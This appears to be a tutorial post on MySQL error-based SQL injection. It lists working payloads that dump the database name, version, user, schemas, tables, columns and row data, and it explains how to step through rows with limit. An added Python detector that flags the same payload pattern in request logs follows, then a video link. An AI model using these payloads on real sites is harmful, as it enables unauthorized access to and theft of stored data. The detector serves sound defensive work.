MySQL Error Injection

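Error-based injection is essentially a formulaic injection method.
It arises because database error messages are output on the page.
When the page has no display position (no place where query results are echoed), we can use error-based injection.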

Dump the current database

and(select 1 from(select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Dump the version

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Dump the current user

and(select 1 from(select count(*),concat((select(select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Dump the databases

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Dump the tables:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=<database name in hex> or '<database name>' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Dump the columns:

and(select 1 from(select count(*),concat((select(select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=<database name in hex> or '<database name>' and table_name=<table name in hex> or '<table name>' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Dump the data:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,<column name>,0x7e))) from <database name>.<table name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
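
limit start,count
Which row to start from, and how many rows to take
limit 0,1
Start from row 0 and take one row
limit 1,1
Start from row 1 and take one row
limit 2,1
limit 3,1
limit 4,1
Keep going until there is no more data.
Then proceed just as with ordinary injection.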
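
Every payload above shares one skeleton (count(*), concat(...), floor(rand(0)*2) and group by), which makes this technique easy to flag in request logs. The detector below is an added example, not code from the original post; the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Structural markers shared by every payload listed on this page.
MARKERS = {
    "rand_floor": re.compile(r"floor\(rand\(\d*\)\*2\)"),
    "group_by": re.compile(r"groupby"),
    "count_star": re.compile(r"count\(\*\)"),
    "concat": re.compile(r"concat\("),
}
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(raw: str) -> str:
    """Canonicalize a logged request: URL-decode (up to 3 layers),
    drop inline SQL comments, lowercase, remove all whitespace."""
    s = raw
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return re.sub(r"\s+", "", SQL_COMMENT.sub("", s).lower())


def score_request(raw: str) -> dict:
    s = normalize(raw)
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(s))
    return {
        # floor(rand(0)*2) used as a GROUP BY key is what raises the
        # duplicate-entry error; the other markers only add confidence.
        "suspicious": "rand_floor" in hits and "group_by" in hits,
        "hits": hits,
        "touches_metadata": "information_schema" in s,
    }


# Constructed sample requests (not taken from any real log).
SAMPLES = [
    "/news.php?id=42",
    "/search?q=group+by+floor",
    "/news.php?id=1%20AND(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20"
    "DATABASE()),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(score_request(line)["suspicious"], line[:60])
```

A hit only marks a request for review; the fix on the application side remains parameterized queries and not echoing database errors to the page.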

Video demonstration:
Link: http://pan.baidu.com/s/1slzBEbj Password: b5sg
This is my personal understanding, for reference only.